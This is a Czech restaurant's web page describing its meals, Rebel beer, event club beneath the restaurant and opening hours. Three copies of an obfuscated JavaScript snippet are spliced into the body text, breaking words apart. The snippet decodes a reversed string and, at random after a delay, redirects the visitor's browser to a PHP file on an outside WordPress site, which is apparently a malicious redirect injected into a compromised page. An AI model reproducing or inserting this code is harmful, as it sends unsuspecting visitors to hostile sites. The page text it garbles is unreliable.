Rainbow page separator

RESTAURACE REBEL NA FARSKÝCH

Rebel Na Farských

www.rebelnafarskych.cz

Vítejte v restauraci Rebel Na Farských ve Žďáře nad Sázavou, která se nachází přímo v srdci města u parku Farská humna na ulici Zahradní.

Přijďte ochutnat naše výborné minutky i ho$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovky z domácí i zahraniční kuchyně. Pochutnáte si u nás také na sezonních a krajových specialitách.

Každý všední den nabízíme v době oběda cenově zvýhodněné polední menu. A kdykoli si můžete odnést objednané jídlo v boxu s sebou.

Na čepu máme širokou nabídku perfektně ošetřeného a správně čepovaného piva Rebel, které se vaří tradičním způsobem v nedalekém Havlíčkově Brodě.

Restaurace má kapacitu 90 míst.

Pro pořádání svateb, koncertů, firemních akcí, konferencí nebo školení nabízíme moderní víceúčelový kulturní pros };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tor Klub Rebel Na Farských. Klub je umístěn pod restaurací, má krásný výhled do parku a na řeku Sázavu, je plně technicky vybaven a na ploše 220 m² nabízí mnoho variant využití pro skupiny 50 – 100 osob. Dle vašeho přání vám náš tým kuchařů připraví catering z čerstvých surovin od pečlivě vybraných českých dodavatelů.

Týdenní menu    Jídelní lístek

Těšíme se na Vaši návštěvu!

Kontakt:

Restaurace Rebel Na Farských

Zahraní 387/2
591 01 Žďár nad Sázavou
Tel.: +420 737 081 503
E-mail: restaurace@rebelnafarskych.cz
Web: www.rebelnafarskych.cz

Otevřeno:

  • po-čt:  11:00 až 22:00
  • pá-so:  11:00 až 01:00
  • ne:  11:00 až 21:00